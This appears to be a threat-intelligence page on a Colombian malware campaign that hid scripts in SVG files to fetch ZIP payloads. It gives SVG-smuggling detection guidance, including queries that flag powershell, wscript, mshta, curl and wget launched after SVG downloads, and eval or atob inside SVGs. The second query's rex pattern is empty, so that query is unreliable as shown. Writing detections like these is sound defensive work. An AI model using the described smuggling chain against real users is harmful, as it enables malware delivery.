Campaigns
AI Code Insight Unmasks Hidden Colombian SVG Malware Lure

AI Code Insight Unmasks Hidden Colombian SVG Malware Lure

ColombianMalwareSVGThreatsAIThreatDetection
Investigators found a wave of malware in Colombia hidden in everyday SVG files. Behind clean visuals, the attackers concealed scripts that fetched harmful ZIP payloads. They masked their work with phishing tricks and even faked legal symbols to appear trustworthy. AI code analysis peeled back these layers, showing how simple graphics carried complex threats.

Indicators of Compromise

No domains found for this campaign

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION


T1027.017 Obfuscated Files or Information: SVG Smuggling


ID

Data Source

Data Component

Detects

DS0022

File

File Creation

Monitor for newly constructed files via JavaScript. Developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging. Consider monitoring files downloaded from the Internet, possibly by SVG Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.

SVG Smuggling is often chained:

  • .svg downloaded → parsed or executed by browser/email client

  • Drops or references a secondary payload (HTML/JS/Payload)

  • Follow-on execution with powershell, cmd, wscript, etc.

Analytic 1 - Detect malicious use of SVG files embedded with script tags to assemble, download, or redirect to payloads.

index= (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" OR sourcetype="linux_audit" OR sourcetype="osquery")(file_name=".svg" OR file_path="\Downloads\.svg" OR file_path="/tmp/.svg" OR file_path="/Users//Downloads/.svg")| join type=inner file_path [ search index= process_name IN ("powershell.exe", "wscript.exe", "cmd.exe", "mshta.exe", "bash", "curl", "wget") | stats min(_time) as proc_time by file_path, process_name, host]| eval time_diff=proc_time - _time| where time_diff >= 0 AND time_diff < 120| table _time, host, user, file_path, file_name, process_name, command_line, time_diff| sort _time

Analytic 2 - Suspicious JavaScript or Obfuscation in SVG

file_name=".svg"| rex field=_raw ""| search js_payload="eval" OR js_payload="atob" OR js_payload="window.location" OR js_payload="document.write"| table _time, file_name, js_payload

Observed Countries1

CO (501)